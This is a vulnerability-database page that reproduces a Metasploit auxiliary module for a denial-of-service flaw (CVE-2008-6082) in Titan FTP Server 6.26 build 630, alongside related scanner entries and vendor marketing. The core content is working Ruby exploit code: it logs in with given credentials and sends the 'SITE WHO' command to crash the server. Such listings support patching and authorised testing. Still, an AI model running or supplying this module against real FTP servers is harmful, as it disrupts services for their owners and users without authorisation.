Lucene search
+L

Titan FTP Server 6.26.630 SITE WHO DoS

🗓️ 09 Jan 2009 05:33:26Reported by kris katterjohn <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 58 Views

Titan FTP Server 6.26.630 SITE WHO DoS. Denial of Service vulnerability in Titan FTP Server version 6.26 build 630 when processing the "SITE WHO" command

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Titan FTP Server < 6.26 Build 631 SITE WHO Command DoS
21 Oct 200800:00
nessus
nessus
Tenable Nessus
Titan FTP Server SITE WHO Command Resource Consumption DoS
16 Oct 200800:00
nessus
circl
Circl
CVE-2008-6082
14 Oct 200800:00
circl
cve
CVE
CVE-2008-6082
6 Feb 200911:00
cve
cvelist
Cvelist
CVE-2008-6082
6 Feb 200911:00
cvelist
exploitdb
Exploit DB
Titan FTP Server 6.26 build 630 - Remote Denial of Service
14 Oct 200800:00
exploitdb
nvd
NVD
CVE-2008-6082
6 Feb 200911:30
nvd
openvas
OpenVAS
TitanFTP Server < 6.26.631 DoS Vulnerability
11 Feb 200900:00
openvas
openvas
OpenVAS
Titan FTP Server < 6.26.631 Remote DoS Vulnerability
23 Oct 200800:00
openvas
openvas
OpenVAS
TitanFTP Server Denial of Service Vulnerability
11 Feb 200900:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Titan FTP Server 6.26.630 SITE WHO DoS',
      'Description'    => %q{
        The Titan FTP server v6.26 build 630 can be DoS'd by
        issuing "SITE WHO".  You need a valid login so you
        can send this command.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-6082'],
          [ 'OSVDB', '49177'],
          [ 'EDB', '6753']
        ],
      'DisclosureDate' => '2008-10-14'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
    ])
  end

  def run
    return unless connect_login
    print_status("Sending command...")
    raw_send("SITE WHO\r\n")
    select(nil,nil,nil,1)
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2022 11:59Current
7.3High risk
Vulners AI Score7.3
CVSS 25
EPSS0.44577
58